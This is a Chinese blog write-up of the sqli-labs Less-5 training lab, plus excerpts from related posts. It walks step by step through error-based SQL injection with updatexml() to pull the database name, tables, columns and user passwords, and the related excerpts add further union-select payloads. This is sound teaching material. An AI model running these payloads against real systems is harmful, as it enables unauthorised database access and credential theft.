sqlilabs-Less-5

已于 2025-05-02 12:55:13 修改
阅读量833 收藏 19
点赞数 38
分类专栏: sql学习之路 文章标签: mybatis
于 2025-05-02 12:51:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80753596/article/details/147660204
版权

目录

一前置总结

二思路分析

1、判断注入点​编辑

2、爆字段个数

3、爆数据库名

4、爆数据库表

5、爆数据库列

6、爆数据库关键信息

一前置总结

sql注入分为两类,有回显的注入和无回显的注入

这一关很明显是没有回显的,所以我们想到采取盲注的方式,而盲注一般分为三大类,报错注入、时间盲注和布尔盲注。可以利用updatexml(),extractvalue()等一些函数来进行

二思路分析

一般的,我们可以将其总结为以下几个步骤

1、判断注入点

2、爆字段个数

3、爆数据库名

4、爆数据库表

5、爆数据库列

6、爆数据库关键信息

1、判断注入点

and 1=1 和 and 1=2测试,发现id=1的情况都是正常的,排除数字型

但是当我们采取1'的情况,出现以下情况,判断可能是单引号闭合,试一试id=1' and 1=2--+发现报错,1=1是正常。说明是单引号闭合的注入。

2、爆字段个数

发现有三个字段,但是接下来的步骤就不一样的不能回显信息,就是和前几关不一样,这里需要通过报错的方式后续还有通过bool的方式判断

3、爆数据库名

http://127.0.0.1/sqlilabs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x3a,(select%20database()),0x3a),1)--+

4、爆数据库表

id=1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1)--+

递归查询,发现第三个可能性最大

5、爆数据库列

http://127.0.0.1/sqlilabs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%22users%22%20limit%200,1),0x3a),1)--+依次是id username password

6、爆数据库关键信息

http://127.0.0.1/sqlilabs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x3a,(select%20password%20from%20users%20limit%200,1),0x3a),1)--+

网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 151
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1807
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs less-26a
wanggonghanfei的博客
10-19 460
linux下靶场sqli-labs less-26a
Sqli-labs less-17
weixin_46099552的博客
08-15 466
会报错,所以应该使用报错注入(图放错了)在burp抓包后放进重放器然后直接粘贴就行。语句就知道应该是在密码上注入,输入。看对话框是新建用户,是。可以使用子查询来绕过。
Sqli-labs less-27
wanggonghanfei的博客
10-19 985
union/select绕过注入sqli-labs less-27
sqli-labs-master less1-less6
bunengyongzho666的博客
08-02 1337
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+id=0的') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+?
SQL注入sqlilabs-master闯关-Less-1
guzilili的博客
09-14 217
注意查询时前面的id不能有返回内容 可以所有用0或-1代替(传入一个错误id值)注意:如果不用group_concat()将表中第一行的用户账户和密码。注意:如果不用group_concat连结 只返回一个查询结果。数据库名为security 版本为mysql5.7。返回错误 说明有三个字段(用--+将'闭合)以此判断类型为数字型注入,传入了错误参数1’传入参数id=2,返回正常,但页面不同。返回正常(用--+将'闭合)传入参数id,返回正常。传入参数id=1'出错。显示回显位置为2,3。
Sqli-labs Less8-Less16
beiweixiaotian66的博客
07-23 826
一丢丢小练习
​Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2267
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 308
错误回显sql语句猜测。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1021
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
MybatisPlus的LambdaQueryWrapper用法
2301_79693537的博客
08-21 6129
【代码】MybatisPlus的LambdaQueryWrapper用法。
少儿编程scratch项目源代码文件案例素材-方形跑步者.zip
最新发布
05-03
少儿编程scratch项目源代码文件案例素材-方形跑步者.zip
Rust编译器诊断:友好的借用检查提示.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权与借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
mmap高级用法:Rust内存映射文件性能优化.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权与借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
三菱PLC5u与台达变频器Modbus RTU通讯全套方案:含PLC与触摸屏程序、接线定义及详细注释
05-03
内容概要:本文详细介绍了三菱PLC 5u与台达变频器通过Modbus RTU协议进行通讯的全过程。涵盖了硬件接线方法,确保RS-485接口正确连接;变频器参数设置,包括通讯地址、波特率、数据格式等关键参数的调整;PLC程序编写,利用Modbus RTU功能块实现数据读写;以及威纶通触摸屏程序配置,提供友好的人机交互界面。每一步骤均配有详尽解释和实例代码,确保实施过程顺畅。 适合人群:从事工业自动化领域的工程师和技术人员,尤其是对PLC和变频器通讯有一定了解的基础用户。 使用场景及目标:适用于需要将三菱PLC 5u与台达变频器集成到同一系统中的工程项目,旨在建立稳定的通讯链路,实现高效的数据交换和远程控制。通过本文的学习,可以掌握完整的通讯解决方案,提高系统的可靠性和可控性。 其他说明:文中提供了丰富的调试技巧和常见问题解决方法,如通讯超时排查、CRC校验注意事项等,有助于快速定位并解决问题。同时附带了完整的程序包和接线图,便于实际应用。
双向全桥LLC与CLLC拓扑双闭环控制详解:设计步骤、原理分析、参数计算选型及MATLAB仿真实践
05-03
内容概要:本文详细介绍了双向全桥CLLC拓扑的双闭环控制系统设计及其MATLAB/Simulink仿真。首先解析了CLLC拓扑结构,重点讨论了谐振腔参数(Lr、Cr、Lm)的选择和计算方法。接着阐述了双闭环控制策略,即电压外环确保稳态精度,电流内环应对动态扰动,并提供了具体的PI控制器实现代码。文中还强调了磁性元件选型的重要性,特别是变压器设计中的注意事项。最后,通过仿真验证系统的动态响应性能,展示了负载突增时的恢复时间和软开关效果。同时,作者分享了许多实用的调试技巧和避坑经验。 适合人群:从事电力电子设计的技术人员,尤其是对双向DC-DC变换器感兴趣的工程师。 使用场景及目标:适用于需要高效双向能量传输的应用场合,如储能系统、电动汽车充电设备等。目标是帮助读者掌握CLLC拓扑的设计原理和控制方法,提高系统效率和稳定性。 其他说明:文章不仅提供了详细的理论推导和公式计算,还附带了完整的MATLAB/Simulink仿真文件,便于读者进行实践操作。此外,作者针对常见问题给出了具体的解决方案,使读者能够更快地理解和应用相关技术。
基于轮毂电机分布式驱动的电动汽车DYC直接横摆力矩控制:MatlabSimulink源码实现与多种控制策略选择
05-03
内容概要:本文详细介绍了轮毂电机分布式驱动电动汽车的直接横摆力矩控制(DYC)技术及其在Matlab/Simulink中的实现。首先构建了一个7自由度的整车模型,涵盖了车身横摆、侧倾、垂跳以及四个车轮的独立旋转,确保模型能够精确模拟真实车辆行为。轮胎模型采用了魔术公式进行参数化,确保不同路况下的抓地力计算准确性。上层控制器选择了模糊PID控制,通过规则库实现了对不同驾驶情况的智能响应,特别是在横摆角速度误差较大时切换为滑模控制,提高了系统的鲁棒性和稳定性。扭矩分配方面,采用了平均分配策略并加入了动态限幅机制,确保各电机在不同工况下的高效协同工作。联合控制策略融合了横摆角速度跟踪和质心侧偏角控制,通过自适应权重系数优化了车辆的整体操控性能。 适合人群:汽车工程专业学生、自动驾驶及电动汽车领域的研究人员和技术人员。 使用场景及目标:适用于研究和开发轮毂电机分布式驱动电动汽车的操稳性控制系统,旨在提高车辆在各种复杂路况下的稳定性和安全性。 其他说明:文中提供了大量具体的代码片段和实验数据,帮助读者更好地理解和应用所介绍的技术方案。同时强调了理论与实际相结合的重要性,指出了在实车验证过程中需要注意的关键点。
少儿编程scratch项目源代码文件案例素材-愤怒的小鸟太空版黄金版.zip
05-03
少儿编程scratch项目源代码文件案例素材-愤怒的小鸟太空版黄金版.zip
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中,我们尝试闭合单引号来看是否存在注入点。在第二步中,我们尝试使用恶意的union select语句来获取数据库中的信息。在这个例子中,我们使用了"-2") union select 1,2,3 --"作为注入代码。通过这个注入代码,我们可以判断当前数据库的一些信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值